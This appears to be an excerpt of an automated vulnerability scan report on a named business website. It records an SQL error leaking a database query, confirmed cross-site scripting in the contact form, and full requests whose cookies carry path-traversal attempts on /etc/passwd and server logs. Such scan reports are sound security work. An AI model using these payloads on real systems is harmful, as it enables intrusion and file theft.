select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/cace00/project.php?catId='"--></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0009DD)</script>&iusrc=iupsc/' union sel' at line 5
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST " stYle="x:expre/**/ssion(alert(9))
company POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=%22+stYle%3d%22x%3aexpre%2f**%2fssion(netsparker(9))+&company=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:34:58 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F0E7BA5CE2931945AD5C1200F5A06E46; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content="InsideUp, business, wiki, advertise, business category, vendors, ratings, business service, technology, leads, community, social networking, referral, reference, share, San Diego, commerce, b2b, trade, industry, selling, production, big business, dealing, corporation, conglomerate, establishment, partnership, firm, multinational, transnational, small business, enterprise, venture, organization, transaction, contract, commercial, occupational, corporate, publicize, market, search, contact, email"/> <meta name="description" content="Getting in touch with the InsideUp team"/> <meta name="robots" content="index; follow"/> <title>Contact us and send your feedback.</title> <link rel="stylesheet" type="text/css" href="/css/mainNewInsideup.css" />
<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="3" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td width="473" valign="top" style="padding:15px 0 0 0;"> ..
- /contactUs.html

/contactUs.html CONFIRMED

http://www.insideup.com/contactUs.html

Parameters

Parameter Type Value
button POST Submit
captchaString POST 3
comments POST 3
company POST '"--></style></script><script>alert(0x000B9F)</script>
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
leadCategory POST 3
phone POST 3
subCategoryId POST -1
url POST 3
value POST 3
yourInterest POST 3

Request

POST /contactUs.html HTTP/1.1
Referer: http://www.insideup.com/contactUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 265
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

button=Submit&captchaString=3&comments=3&company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000B9F)%3c%2fscript%3e&email=netsparker%40example.com&firstName=Smith&lastName=Smith&leadCategory=3&phone=3&subCategoryId=-1&url=3&value=3&yourInterest=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:35:05 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=9BACDA5BFEAA33699135F145358F44AA; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


